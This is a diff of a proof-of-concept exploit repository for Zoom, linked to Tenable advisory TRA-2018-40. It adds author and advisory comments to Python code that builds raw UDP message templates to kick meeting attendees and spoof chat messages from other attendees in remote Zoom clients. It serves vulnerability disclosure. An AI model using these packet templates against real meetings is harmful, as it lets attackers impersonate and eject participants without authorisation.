Zoom POC

Author: captainwells

Zoom/msg_templates.py

@@ -1,3 +1,7 @@
+# David Wells
+# https://www.tenable.com/security/research/tra-2018-40
+#
+
 class Msg_Templates:
     '''
     Message Templates for Initializing Various Zoom Class Objects That We Will Be Abusing
@@ -8,7 +12,7 @@ class Msg_Templates:
 
     KICK_USER = ('{}\x0e\x01{}\x00\x04\x00\x01\x00\x04\x00\x88\x04{}{}\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00')   
 
-    CHAT_MSG = ('\x07\x00\x00\x00Version'      # Version 
+    CHAT_MSG = ('\x07\x00\x00\x00Version'       # Version 
                 '\x04\x00\x00\x001.00'          # 1.00
                 '\x07\x00\x00\x00Content'       # Content
                 '{}\x00\x00\x00{}'              # Msg

Zoom/zoomster.py

@@ -5,11 +5,15 @@
 import base64
 from msg_templates import *
 
+# https://www.tenable.com/security/research/tra-2018-40
+# This code crafts and sends UDP packets to invoke restricted commands
+# found in Zoom's ssb_sdk
+#
 
 class Zoomster:
     '''
     Toolset Invokes Restricted Functionalities in Remote Zoom Clients.
-    This is only a MINIMAL POC example and may require additional tweaking for various scenarios
+    This is a MINIMAL POC example and may require additional tweaking for various scenarios
 
     :param remote_ip: target attendee's IP address
     :param local_port: local port of source Zoom user
@@ -35,7 +39,7 @@ def spoof_chat(self, src_attendee_id, msg):
             self.P2P_HEADER,
             chr(src_attendee_id),
             chr(src_attendee_id),
-            '\x04', # value may be other multiple of 0x04 (0x8, 0x10, ...)
+            '\x04', # value may be other multiple of 4 depending on call (0x8, 0x10, ...)
             chr(len(msg_payload)),
             chr(len(msg_payload)),
             msg_payload